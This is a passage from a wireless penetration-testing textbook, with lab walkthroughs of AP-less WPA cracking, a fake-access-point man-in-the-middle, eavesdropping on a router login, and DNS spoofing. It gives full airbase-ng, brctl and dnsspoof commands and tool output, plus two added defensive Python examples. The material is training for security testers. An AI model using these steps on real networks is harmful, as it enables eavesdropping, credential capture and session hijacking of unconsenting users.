[Screenshot: the airbase-ng session. After "Trying to set MTU on mon0 to 1800" and "Access Point with BSSID 00:21:91:D2:8E:25 started." it prints repeated "Client 60:FB:42:D5:E4:01 associated (WEP) to ESSID: "Wireless Lab"" lines, then "Starting Hirte attack against 60:FB:42:D5:E4:01 at 100 pps." and "140 bytes keystream: 60:FB:42:D5:E4:01".]
5. We start aircrack-ng as in the case of the Caffe Latte attack and eventually the 
key would be cracked as shown next: 


[Screenshot: Aircrack-ng 1.0 r1645: "[00:25:36] Tested 1285089 keys (got 48988 IVs)", the byte(vote) table, and the result:
    KEY FOUND! [ AB:CD:EF:AB:CD:EF:AB:CD:EF:AB:CD:EF:12 ]
    Decrypted correctly: 100%]


What just happened?


We launched the Hirte attack against a WEP client which was isolated and away from the 
authorized network. We cracked the key exactly as in the Caffe Latte attack case. 


Have a go hero





We would recommend setting different WEP keys on the client and trying this exercise a 
couple of times to gain confidence. You may notice many times that you have to reconnect 
the client to get it to work. 


In a previous chapter, we have seen how to crack WPA/WPA2 PSK using aircrack-ng. The 
basic idea was to capture a four-way WPA handshake and then launch a dictionary attack. 


The million dollar question is: would it be possible to crack WPA-Personal with just the 
client? No access point! 




Let's revisit the WPA cracking exercise to jog our memory. 


[Diagram: the WPA four-way handshake between Supplicant and Authenticator. Both sides start from the 256-bit Pre-Shared Key; after Probe Request/Response, Authentication Request/Response and Association Request/Response the four EAPOL messages are exchanged, ending with "Key Installed" on both sides.]





To crack WPA, we need the following four parameters from the Four-Way Handshake: 
Authenticator Nonce, Supplicant Nonce, Authenticator MAC, and Supplicant MAC. Now the 
interesting thing is that we do not need all four packets in the handshake to extract 
this information. We can get this information with either all four packets, or packets 1 and 2, 
or just packets 2 and 3. 


In order to crack WPA-PSK, we will bring up a WPA-PSK Honeypot and when the client 
connects to us, only Message 1 and Message 2 will come through. As we do not know the 
passphrase, we cannot send Message 3. However, Message 1 and Message 2 contain all the 
information required to begin the key cracking process. 


[Diagram: the same handshake against a Honeypot. After Authentication and Association (both sides holding a 256-bit Pre-Shared Key) the Honeypot sends Message 1 (ANonce) and the client answers with Message 2 (SNonce + MIC); the exchange stops there, and Message 2 feeds the WPA/WPA2 PSK Dictionary Attack.]
Time for action — AP-less WPA cracking 


1. We will set up a WPA-PSK Honeypot with the ESSID Wireless Lab. The -z 2 option 
creates a WPA-PSK access point which uses TKIP: 





root@bt:~# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -W 1 -z 2 mon0
Created tap interface at0
Trying to set MTU on at0 to 1500
Trying to set MTU on mon0 to 1800
Access Point with BSSID 00:21:91:D2:8E:25 started.








2. Let's also start airodump-ng to capture packets from this network: 


root@bt:~# airodump-ng -c 3 --bssid 00:21:91:D2:8E:25 --write AP-less-WPA-cracking mon0





3. Now when our roaming client connects to this access point, it starts the handshake 
but fails to complete it after Message 2 as discussed previously: 


[Screenshot: the airbase-ng session for the WPA-PSK Honeypot. After "Access Point with BSSID 00:21:91:D2:8E:25 started." (23:56) it prints repeated "Client 60:FB:42:D5:E4:01 associated (WPA1; TKIP) to ESSID: "Wireless Lab"" lines as the client keeps associating and re-associating without ever completing the handshake.]
4. But airodump-ng reports that the handshake has been captured: 


[Screenshot: airodump-ng output with the status "CH 3 ][ Elapsed: 1 min ][ 2011-06-27 23:57 ][ WPA handshake: 00:21:91:D2:8E:25". The Honeypot 00:21:91:D2:8E:25 shows 1254 beacons, 34 data packets, ENC WPA, CIPHER TKIP, AUTH PSK, ESSID Wireless Lab, and the station 60:FB:42:D5:E4:01 (PWR -18) is associated to it.]





5. We run the airodump-ng capture file through aircrack-ng with the same 
dictionary file as before; eventually the passphrase is cracked as shown next: 


[Screenshot: Aircrack-ng 1.0 r1645 running the dictionary attack: 176 keys tested (382.44 k/s), then "KEY FOUND!" with the passphrase (blurred in the screenshot), followed by the derived Master Key, Transient Key and EAPOL HMAC.]





What just happened?
We were able to crack the WPA key with just the client. This was possible because even with 
just the first two packets, we have all the information required to launch a dictionary attack 
on the handshake. 
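The handshake description earlier in this section and the exercise just completed point to the trace a WPA-PSK Honeypot leaves on the air: Message 1 and Message 2 repeat, but Message 3, which only a party that knows the pairwise master key can produce, never follows. The following added example, not code from the book or from aircrack-ng, classifies EAPOL-Key frames into handshake messages from the Key Information bits defined in IEEE 802.11i and reports (access point, station) pairs whose handshakes stop at Message 2. SAMPLE_RECORDS is constructed (the BSSIDs and station addresses are the ones from this chapter's listings); telling Message 2 from Message 4 by the Secure bit or an empty key-data field is a heuristic I am assuming here, not a rule stated by the page.

```python
"""Flag access points whose WPA four-way handshakes stop after Message 2.

Added example; not code from the book or from aircrack-ng. SAMPLE_RECORDS is
constructed: (time, source, destination, EAPOL Key Information, key-data length).
"""
from collections import defaultdict

# Key Information bits of the EAPOL-Key frame (IEEE 802.11i)
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200

HONEYPOT_AP = "00:21:91:d2:8e:25"
CLIENT = "60:fb:42:d5:e4:01"
REAL_AP = "00:1e:40:53:02:fc"         # vivek's access point from the listings above
OTHER_CLIENT = "e4:ec:10:4f:ad:74"

SAMPLE_RECORDS = [
    # Honeypot: three attempts, each Message 1 -> Message 2 and nothing more (TKIP, descriptor v1)
    (0.00, HONEYPOT_AP, CLIENT, 0x0089, 0),
    (0.01, CLIENT, HONEYPOT_AP, 0x0109, 24),
    (1.00, HONEYPOT_AP, CLIENT, 0x0089, 0),
    (1.01, CLIENT, HONEYPOT_AP, 0x0109, 24),
    (2.00, HONEYPOT_AP, CLIENT, 0x0089, 0),
    (2.01, CLIENT, HONEYPOT_AP, 0x0109, 24),
    # a genuine WPA2/CCMP handshake (descriptor v2) on another network
    (0.50, REAL_AP, OTHER_CLIENT, 0x008a, 0),
    (0.51, OTHER_CLIENT, REAL_AP, 0x010a, 22),
    (0.52, REAL_AP, OTHER_CLIENT, 0x13ca, 56),
    (0.53, OTHER_CLIENT, REAL_AP, 0x030a, 0),
    # a group-key (GTK) rekey message: not part of the pairwise handshake
    (3.00, REAL_AP, OTHER_CLIENT, 0x1382, 22),
]


def classify(key_info, key_data_len):
    """Return 1..4 for a pairwise handshake message, None for anything else."""
    if not key_info & KEY_INFO_PAIRWISE:
        return None
    ack = bool(key_info & KEY_INFO_ACK)
    mic = bool(key_info & KEY_INFO_MIC)
    install = bool(key_info & KEY_INFO_INSTALL)
    secure = bool(key_info & KEY_INFO_SECURE)
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    if mic and not ack and not install:
        # Heuristic: Message 4 carries no key data (and sets Secure in WPA2);
        # Message 2 carries the RSN/WPA information element.
        return 4 if (secure or key_data_len == 0) else 2
    return None


def audit_handshakes(records):
    """{(ap, station): {"attempts", "m2_without_m3", "m3_seen"}} over the records."""
    stats = defaultdict(lambda: {"attempts": 0, "m2_without_m3": 0, "m3_seen": 0})
    progress = {}                      # pair -> highest message number in the current attempt

    def close(pair):
        if progress.pop(pair, None) == 2:
            stats[pair]["m2_without_m3"] += 1

    for _t, src, dst, key_info, kd_len in sorted(records):
        msg = classify(key_info, kd_len)
        if msg is None:
            continue
        pair = (src, dst) if msg in (1, 3) else (dst, src)   # normalise to (ap, station)
        if msg == 1:
            close(pair)                # a new Message 1 ends the previous attempt
            stats[pair]["attempts"] += 1
            progress[pair] = 1
        elif pair in progress:
            progress[pair] = max(progress[pair], msg)
            if msg == 3:
                stats[pair]["m3_seen"] += 1
            if msg == 4:
                close(pair)
    for pair in list(progress):
        close(pair)
    return dict(stats)


def find_honeypot_candidates(stats, min_failures=2):
    """Pairs where the AP collected Message 2 repeatedly but never sent Message 3."""
    return sorted((ap, sta, s["m2_without_m3"]) for (ap, sta), s in stats.items()
                  if s["m3_seen"] == 0 and s["m2_without_m3"] >= min_failures)


if __name__ == "__main__":
    for ap, sta, failures in find_honeypot_candidates(audit_handshakes(SAMPLE_RECORDS)):
        print(f"{ap} collected {failures} Message 2 replies from {sta} without ever sending Message 3")
```

A client with a wrong passphrase produces the same M1/M2-only pattern against a legitimate access point, so the access point side matters: a BSSID that never sends Message 3 to anyone, while the inventory says the ESSID is ours, is the Honeypot case. The reply to a mis-association and the reply to the Honeypot look identical to the client, which is why this check belongs on a wireless monitor rather than on the client.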
We would recommend setting different WEP keys on the client and trying this exercise a 
couple of times to gain confidence. You may notice many times that you have to reconnect 
the client to get it to work. 


1. What encryption key can the Caffe Latte attack recover? 
   a. None 
   b. WEP 
   c. WPA 
   d. WPA2 


2. A Honeypot access point would typically use: 
   a. No Encryption, Open Authentication 
   b. No Encryption, Shared Authentication 
   c. WEP Encryption, Open Authentication 
   d. None of the above 


3. Which of the following are DoS attacks? 
   a. Mis-Association attack 
   b. De-Authentication attacks 
   c. Dis-Association attacks 
   d. Both (b) and (c) 


4. A Caffe Latte attack requires 
   a. That the wireless client be in radio range of the access point 
   b. That the client contains a cached and stored WEP key 
   c. WEP encryption with at least 128 bit encryption 
   d. Both (a) and (c) 


Attacking the Client

Summary


In this chapter, we have learned that even the wireless client is susceptible to attacks. These
include the following: Honeypot and other Mis-Association attacks, the Caffe Latte attack to
retrieve the key from the wireless client, De-Authentication and Dis-Association attacks
causing a Denial of Service, the Hirte attack as an alternative to retrieving the WEP key from a
roaming client, and finally cracking the WPA-Personal passphrase with just the client.

In the next chapter, we will use all our learning until now to conduct various advanced
wireless attacks on both the client and infrastructure side. So, quickly flip the page to the
next chapter!


"To know your enemy, you must become your enemy."
Sun Tzu, Art of War

As a penetration tester, it is important to know the advanced attacks a
hacker could do, even if you might not check or demonstrate them during
a penetration test. This chapter is dedicated to how a hacker could conduct
advanced attacks using wireless access as the starting point.


In this chapter, we will look at how we can conduct advanced attacks using what we have 
learned till now. We will primarily focus on Man-in-the-Middle (MITM) attack, which 
requires a certain amount of skill and practice to conduct successfully. Once we have done 
this, we will use this MITM attack as a base to conduct more sophisticated attacks such as 
Eavesdropping and Session Hijacking. 


We will cover the following: 


- Man-in-the-Middle attack
- Wireless Eavesdropping using MITM
- Session Hijacking using MITM


MITM attacks are probably one of the most potent attacks on a WLAN system. There are
different configurations that can be used to conduct the attack. We will use the most
common one: the attacker is connected to the Internet using a wired LAN and is creating
a fake access point on his client card. This access point broadcasts an SSID similar to a local
hotspot in the vicinity. A user may accidentally get connected to this fake access point (or can
be forced to, using the higher signal strength theory we discussed in the previous chapters)
and may continue to believe that he is connected to the legitimate access point.


Advanced WLAN Attacks 


The attacker can now transparently forward all the user's traffic over the Internet using the 
bridge he has created between the wired and wireless interfaces. 


In the following lab exercise, we will simulate this attack. 


Time for action — Man-in-the-Middle attack


Follow these instructions to get started: 





1. To create the Man-in-the-Middle attack setup, we will first create a soft access
point called mitm on the hacker laptop using airbase-ng. We run the command
airbase-ng --essid mitm -c 11 mon0:

root@bt:~# airbase-ng --essid mitm -c 11 mon0
07:52:16  Created tap interface at0
07:52:16  Trying to set MTU on at0 to 1500
07:52:16  Access Point with BSSID 00:C0:CA:3E:BD:93 started.





2. It is important to note that airbase-ng, when run, creates an interface at0 (tap
interface). Think of this as the wired-side interface of our software-based access
point mitm.

root@bt:~# ifconfig at0
at0       Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

root@bt:~#
3. Let us now create a bridge on the hacker laptop, consisting of the wired (eth0) and
wireless (at0) interfaces. The succession of commands used for this is: brctl
addbr mitm-bridge, brctl addif mitm-bridge eth0, brctl addif mitm-bridge
at0, ifconfig eth0 0.0.0.0 up, ifconfig at0 0.0.0.0 up:

root@bt:~# brctl addbr mitm-bridge
root@bt:~# brctl addif mitm-bridge eth0
root@bt:~# brctl addif mitm-bridge at0
root@bt:~# ifconfig eth0 0.0.0.0 up
root@bt:~# ifconfig at0 0.0.0.0 up
root@bt:~#





4. We can assign an IP address to this bridge and check the connectivity with the
gateway. Please note that we could do the same using DHCP as well. We can assign
an IP address to the bridge interface with the command ifconfig mitm-bridge
192.168.0.199 up. We can then try pinging the gateway 192.168.0.1 to ensure we
are connected to the rest of the network:

root@bt:~# ping 192.168.0.1
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=0.557 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=1.11 ms
64 bytes from 192.168.0.1: icmp_seq=3 ttl=64 time=0.915 ms
64 bytes from 192.168.0.1: icmp_seq=4 ttl=64 time=0.873 ms
64 bytes from 192.168.0.1: icmp_seq=5 ttl=64 time=0.539 ms

--- 192.168.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 0.539/0.800/1.119/0.224 ms
root@bt:~#
5. Let us now turn on IP forwarding in the kernel so that routing and packet forwarding
can happen correctly, using echo 1 > /proc/sys/net/ipv4/ip_forward:

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#





6. Now let us connect a wireless client to our access point mitm. It would automatically
get an IP address over DHCP (server running on the wired-side gateway). The client
machine in this case receives the IP address 192.168.0.197. We can ping the
wired-side gateway 192.168.0.1 to verify connectivity:

C:\Users\vivek\AppData\Local\msf32>ipconfig

Windows IP Configuration

Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.0.197
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1





7. We see that the host responds to the ping requests:

C:\Users\vivek\AppData\Local\msf32>ping 192.168.0.1

Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time=11ms TTL=64
Reply from 192.168.0.1: bytes=32 time=6ms TTL=64
Reply from 192.168.0.1: bytes=32 time=18ms TTL=64
Reply from 192.168.0.1: bytes=32 time=5ms TTL=64

Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 5ms, Maximum = 18ms, Average = 10ms
8. We can also verify that the client is connected by looking at the airbase-ng
terminal on the hacker machine:

root@bt:~# airbase-ng --essid mitm -c 11 mon0
07:52:16  Created tap interface at0
07:52:16  Trying to set MTU on at0 to 1500
07:52:16  Access Point with BSSID 00:C0:CA:3E:BD:93 started.
08:03:14  Client 00:22:FB:35:FC:44 associated (unencrypted) to ESSID: "mitm"





9. It is interesting to note here that because all the traffic is being relayed from the
wireless interface to the wired side, we have full control over the traffic. We can
verify this by starting Wireshark and sniffing on the at0 interface:

at0 - Wireshark

No.  Time       Source             Destination        Protocol  Info
128  49.169142  IntelCor_35:fc:44  Broadcast          ARP       Who has 192.168.0.1?  Tell 192.168.0.197
129  49.170017  D-Link_d2:8e:25    IntelCor_35:fc:44  ARP       192.168.0.1 is at 00:21:91:d2:8e:25
10. Let us now ping the gateway 192.168.0.1 from the client machine. We can now see
the packets in Wireshark (apply a display filter for ICMP), even though the packets
are not destined for us. This is the power of Man-in-the-Middle attacks!

at0 - Wireshark
Filter: icmp

No.  Time      Source             Destination        Protocol  Info
1    0.000000  IntelCor_35:fc:44  Broadcast          ARP       Who has 192.168.0.1?  Tell 192.168.0.197
2    0.000773  D-Link_d2:8e:25    IntelCor_35:fc:44  ARP       192.168.0.1 is at 00:21:91:d2:8e:25
3    0.006071  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=83/21248, ttl=128)
4    0.008577  192.168.0.1        192.168.0.197      ICMP      Echo (ping) reply    (id=0x0001, seq(be/le)=83/21248, ttl=64)
5    1.001855  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=84/21504, ttl=128)
6    1.002774  192.168.0.1        192.168.0.197      ICMP      Echo (ping) reply    (id=0x0001, seq(be/le)=84/21504, ttl=64)
7    2.014750  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=85/21760, ttl=128)
8    2.018575  192.168.0.1        192.168.0.197      ICMP      Echo (ping) reply    (id=0x0001, seq(be/le)=85/21760, ttl=64)
9    3.003574  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=86/22016, ttl=128)
10   3.008504  192.168.0.1        192.168.0.197      ICMP      Echo (ping) reply    (id=0x0001, seq(be/le)=86/22016, ttl=64)

Frame 4: 74 bytes on wire (592 bits), 74 bytes captured (592 bits)
Ethernet II, Src: D-Link_d2:8e:25 (00:21:91:d2:8e:25), Dst: IntelCor_35:fc:44 (00:22:fb:35:fc:44)
Internet Protocol, Src: 192.168.0.1 (192.168.0.1), Dst: 192.168.0.197 (192.168.0.197)
Internet Control Message Protocol
    Type: 0 (Echo (ping) reply)
    Code: 0
    Checksum: 0x5508 [correct]
    Identifier: 0x0001
    Sequence number: 83 (0x0053)
    Sequence number (LE): 21248 (0x5300)
    Data (32 bytes)

What just happened?
We have successfully created the setup for a wireless Man-In-The-Middle attack. We did this 
by creating a fake access point and bridging it with our Ethernet interface. This ensured that 
any wireless client connecting to the fake access point would "perceive" that it is connected 
to the Internet via the wired LAN. 








Have a go hero - Man-in-the-Middle over pure wireless 


In the previous exercise, we bridged the wireless interface with a wired one. As we noted
earlier, this is one of the possible connection architectures for an MITM. There are other
combinations possible as well. An interesting one would be to have two wireless interfaces:
one creates the fake access point while the other is connected to the authorized access
point. Both these interfaces are bridged. So, when a wireless client connects to our fake access
point, it gets connected to the authorized access point through the attacker machine.

Please note that this configuration would require the use of two wireless cards on the
attacker laptop.


Check if you can conduct this attack using the in-built card on your laptop along with the 
external one. This should be a good challenge! 


Wireless Eavesdropping using MITM 


In the previous lab, we have learned how to create a setup for MITM. Now we will look at 
how to do Wireless Eavesdropping with this setup. 


The whole lab revolves around the principle that all the victim's traffic is now routed through 
the attacker's computer. Thus the attacker can eavesdrop on all the traffic sent to and from 
the victim's machine over wireless. 





Time for action — wireless eavesdropping 


Follow these instructions to get started: 


1. Replicate the entire setup as in the previous lab. Fire up Wireshark. It would be
interesting to note that even the mitm-bridge shows up. This interface would allow
us to peer into the bridge traffic, if we wanted to:

Wireshark: Capture Interfaces
  wlan0
  mon0
  at0
  mitm-bridge   192.168.0.199
  any           Pseudo-device that captures on all interfaces
  usbmon1       USB bus number 1
2. Start sniffing on the at0 interface, so that we can monitor all traffic sent and
received by the wireless client:

Capturing from at0 - Wireshark

No.  Time      Source             Destination        Protocol  Info
7    1.001344  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=116/29696, ttl=128)
8    1.002166  192.168.0.1        192.168.0.197      ICMP      Echo (ping) reply    (id=0x0001, seq(be/le)=116/29696, ttl=64)
9    2.002856  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=117/29952, ttl=128)
10   2.003421  192.168.0.1        192.168.0.197      ICMP      Echo (ping) reply    (id=0x0001, seq(be/le)=117/29952, ttl=64)
11   3.001149  192.168.0.197      192.168.0.1        ICMP      Echo (ping) request  (id=0x0001, seq(be/le)=118/30208, ttl=128)

Frame 1: 60 bytes on wire (480 bits), 60 bytes captured (480 bits)
Ethernet II, Src: IntelCor_35:fc:44 (00:22:fb:35:fc:44), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
Address Resolution Protocol (request)

0000  ff ff ff ff ff ff 00 22 fb 35 fc 44 08 06 00 01
0010  08 00 06 04 00 01 00 22 fb 35 fc 44 c0 a8 00 c5
0020  00 00 00 00 00 00 c0 a8 00 01 00 00 00 00 00 00
0030  00 00 00 00 00 00 00 00 00 00 00 00

Packets: 14  Displayed: 14  Marked: 0





3. On the wireless client, open up any web page. In my case, the wireless access
point is also connected to the LAN and I will open it up by using the address
http://192.168.0.1:

Product Page: DIR-615    Hardware Version: B2    Firmware Version: 2.23

Log in to the router:
User Name: Admin


4. Sign in with my password and enter the management interface.

Product Page: DIR-615    Hardware Version: B2    Firmware Version: 2.23

INTERNET CONNECTION SETUP WIZARD
If you would like to utilize our easy to use Web-based Wizards to assist you in connecting your new
D-Link Systems Router to the Internet, click on the button below.
( Internet Connection Setup Wizard )

MANUAL INTERNET CONNECTION OPTIONS
If you would like to configure the Internet settings of your new D-Link Systems Router manually,
then click on the button below.
( Manual Internet Connection Setup )
5. In Wireshark, we should be seeing a lot of activity:

at0 - Wireshark (the capture now fills with the client's browsing traffic; frame 1 is the
ARP request from IntelCor_35:fc:44 (00:22:fb:35:fc:44) to Broadcast)





6.

at0 - Wireshark

Frame 150: 507 bytes on wire (4056 bits), 507 bytes captured (4056 bits)
Ethernet II, Src: IntelCor_35:fc:44 (00:22:fb:35:fc:44), Dst: D-Link_d2:8e:25 (00:21:91:d2:8e:25)
Internet Protocol, Src: 192.168.0.197 (192.168.0.197), Dst: 192.168.0.1 (192.168.0.1)
Transmission Control Protocol, Dst Port: http (80), Seq: 415, Len: 453
Hypertext Transfer Protocol
    Host: 192.168.0.1\r\n
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729)\r\n
    Accept: image/png,image/*;q=0.8,*/*;q=0.5\r\n
    Accept-Language: en-us,en;q=0.5\r\n
    Accept-Encoding: gzip,deflate\r\n
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
    Keep-Alive: 115\r\n
    Connection: keep-alive\r\n

Packets: 290  Displayed: 290  Marked: 0  Dropped: 0





Chapter 7 


7. We can easily locate the HTTP post request, which was used to send the password
to the wireless access point:

at0 - Wireshark (frame 208, the GET /post_login.xml?hash=... request to 192.168.0.1;
its details are shown magnified in the next step)

Packets: 280  Displayed: 28  Marked: 0  Dropped: 0





8. Next is a magnified look at the preceding packet:

Frame 208: 502 bytes on wire (4016 bits), 502 bytes captured (4016 bits)
Ethernet II, Src: IntelCor_35:fc:44 (00:22:fb:35:fc:44), Dst: D-Link_d2:8e:25 (00:21:91:d2:8e:25)
Internet Protocol, Src: 192.168.0.197 (192.168.0.197), Dst: 192.168.0.1 (192.168.0.1)
Transmission Control Protocol, Src Port: 49472 (49472), Dst Port: http (80), Seq: 396, Ack: 18904, Len: 448
Hypertext Transfer Protocol
    GET /post_login.xml?hash=94e7e8f5c474c69258308d9ce76ceb2634b417d5 HTTP/1.1\r\n
        [Expert Info (Chat/Sequence): GET /post_login.xml?hash=94e7e8f5c474c69258308d9ce76ceb2634b417d5 HTTP/1.1\r\n]
        Request Method: GET
        Request URI: /post_login.xml?hash=94e7e8f5c474c69258308d9ce76ceb2634b417d5
        Request Version: HTTP/1.1
    Host: 192.168.0.1\r\n
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729)\r\n
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
    Accept-Language: en-us,en;q=0.5\r\n
    Accept-Encoding: gzip,deflate\r\n
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
    Keep-Alive: 115\r\n
    Connection: keep-alive\r\n
    \r\n

0030  44 3b e9 d0 00 00 47 45 54 20 ...
9. Expanding the HTTP header allows us to see that the password we entered in
plaintext was not sent as is; instead, a hash has been sent. If we look at packet
no. 64 in the preceding screenshot, we see that a request was made for /md5.js,
which makes us suspect that it is an MD5 hash of the password. It is interesting to
note here that this technique may be prone to a replay attack, if a cryptographic
salt is not used on a per-session basis in the creation of the hash. We leave it
as an exercise for the user to find out the details, as this is not part of
wireless security and hence beyond the scope of this book.

    [Expert Info (Chat/Sequence): GET /post_login.xml?hash=94e7e8f5c474c69258308d9ce76ceb2634b417d5 HTTP/1.1\r\n]
    Request Method: GET
    Request URI: /post_login.xml?hash=94e7e8f5c474c69258308d9ce76ceb2634b417d5
    Request Version: HTTP/1.1





10. This shows how easy it is to monitor and eavesdrop on traffic sent by the client 
during a Man-In-The-Middle attack. 
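The replay weakness noted in step 9 can be made concrete with a small model. The following Python is an added example, not code from the book and not the D-Link firmware's actual login logic (which the capture does not reveal): StaticHashLogin models a client that sends a bare hash of the password, NonceLogin models the per-session challenge the text says is missing, and the two replay_* functions present one captured request twice to each server. All class and function names and the test credential are constructed for this illustration.

```python
import hashlib
import hmac
import os

# Constructed test credential; no relation to the lab router's real password.
PASSWORD = "correct horse battery"


class StaticHashLogin:
    """Models the scheme the capture suggests: the client sends H(password) and
    the server compares it with the stored H(password). Nothing in the request
    is bound to the session, so a captured request stays valid indefinitely."""

    def __init__(self, password):
        self.expected = hashlib.md5(password.encode()).hexdigest()

    @staticmethod
    def client_request(password):
        # What goes on the wire (compare the hash= query parameter in frame 208).
        return {"hash": hashlib.md5(password.encode()).hexdigest()}

    def verify(self, request):
        return hmac.compare_digest(request["hash"], self.expected)


class NonceLogin:
    """The fix the text hints at: the server hands out a fresh, single-use nonce
    per session and the client proves knowledge of the password over that nonce.
    A captured request is useless once its nonce has been consumed."""

    def __init__(self, password):
        # Server-side verifier: a key derived from the password, not the password.
        self.key = hashlib.sha256(password.encode()).digest()
        self.outstanding = set()

    def challenge(self):
        nonce = os.urandom(16).hex()
        self.outstanding.add(nonce)
        return nonce

    @staticmethod
    def client_request(password, nonce):
        key = hashlib.sha256(password.encode()).digest()
        tag = hmac.new(key, nonce.encode(), hashlib.sha256).hexdigest()
        return {"nonce": nonce, "hash": tag}

    def verify(self, request):
        nonce = request["nonce"]
        if nonce not in self.outstanding:
            return False                 # never issued, or already spent: reject
        self.outstanding.discard(nonce)  # single use, even when the tag is wrong
        expected = hmac.new(self.key, nonce.encode(), hashlib.sha256).hexdigest()
        return hmac.compare_digest(request["hash"], expected)


def replay_static():
    """Legitimate login, then the same bytes resent by an eavesdropper."""
    server = StaticHashLogin(PASSWORD)
    captured = StaticHashLogin.client_request(PASSWORD)  # as seen on at0
    return server.verify(captured), server.verify(dict(captured))


def replay_nonce():
    """The same experiment against the nonce-bound scheme."""
    server = NonceLogin(PASSWORD)
    captured = NonceLogin.client_request(PASSWORD, server.challenge())
    return server.verify(captured), server.verify(dict(captured))


if __name__ == "__main__":
    print("static hash : first=%s replay=%s" % replay_static())
    print("nonce-bound : first=%s replay=%s" % replay_nonce())
```

A nonce stops replay of a captured request but not offline guessing of the password from the captured tag, so the real fix for an HTTP management interface is to put it behind TLS; the nonce is the defence in depth that the observation in step 9 points to.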






What just happened?
The MITM setup we created is now allowing us to eavesdrop on the victim's wireless 
traffic without the victim knowing. This is possible because in an MITM all the traffic is 
relayed via the attacker machine. Thus all of the victim's unencrypted traffic is available for 
eavesdropping for the attacker. 


In today's world, all of us would like to keep what we search on Google private. The traffic on 
Google search is unfortunately over HTTP and plain text, by default. 


Can you think of an intelligent display filter you could use with Wireshark to view all the 
Google searches made by the victim? 


Session Hijacking using MITM


One of the other interesting attacks we can build on top of MITM is application session
hijacking. During an MITM attack, the victim's packets are sent to the attacker. It is now the
attacker's responsibility to relay this to the legitimate destination and relay the responses
from the destination to the victim. An interesting thing to note is that, during this process,
the attacker can modify the data in the packets (if unencrypted and unprotected from
tampering). This means he could modify, mangle, and even silently drop packets.

In this next example, we will look at DNS hijacking over wireless using the MITM setup. Then,
using DNS hijacking, we will hijack the browser session to google.com.


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Time for action — session hijacking over wireless 


1. Set up the test exactly as in the Man-in-the-Middle attack lab. On the victim, let's
fire up the browser and type in "google.com". Let us use Wireshark to monitor this
traffic. Your screen should resemble the following:

No.  Time      Source             Destination        Protocol  Info
1    0.000000  IntelCor_35:fc:44  Broadcast          ARP       Who has 192.168.0.1?  Tell 192.168.0.197
2    0.000603  D-Link_d2:8e:25    IntelCor_35:fc:44  ARP       192.168.0.1 is at 00:21:91:d2:8e:25





2. Apply a Wireshark filter for DNS and, as we can see, the victim is making DNS
requests for "google.com":

at0 - Wireshark
Filter: dns

No.  Time      Source         Destination   Protocol  Info
5    2.000004  192.168.0.197  192.168.0.1   DNS       Standard query A google.com

Frame 5: 70 bytes on wire (560 bits), 70 bytes captured (560 bits)
Ethernet II, Src: IntelCor_35:fc:44 (00:22:fb:35:fc:44), Dst: D-Link_d2:8e:25 (00:21:91:d2:8e:25)
Internet Protocol, Src: 192.168.0.197 (192.168.0.197), Dst: 192.168.0.1 (192.168.0.1)
User Datagram Protocol, Src Port: 63500 (63500), Dst Port: domain (53)
Domain Name System (query)
    Transaction ID: 0x72a3
    Flags: 0x0100 (Standard query)
    Questions: 1
    Answer RRs: 0
    Authority RRs: 0
    Additional RRs: 0
    Queries
        google.com: type A, class IN
            Name: google.com
            Type: A (Host address)
            Class: IN (0x0001)
3. In order to hijack the browser session, we will need to send fake DNS responses
which resolve the IP address of "google.com" to the hacker machine's IP address
192.168.0.199. The tool we will use for this is called Dnsspoof and the syntax is
dnsspoof -i mitm-bridge:

root@bt:~# dnsspoof -i mitm-bridge
dnsspoof: listening on mitm-bridge [udp dst port 53 and not src 192.168.0.199]





4. Refresh the browser window and now, as we can see through Wireshark, as soon
as the victim makes a DNS request for any host (including google.com), Dnsspoof
replies back:

root@bt:~# dnsspoof -i mitm-bridge
dnsspoof: listening on mitm-bridge [udp dst port 53 and not src 192.168.0.199]
192.168.0.197.52658 > 192.168.0.1.53:  47096+ A? google.com

Capturing from at0 - Wireshark
Filter: dns

No.  Time      Source         Destination    Protocol  Info
8    7.509354  192.168.0.1    192.168.0.197  DNS       Standard query response A 192.168.0.199

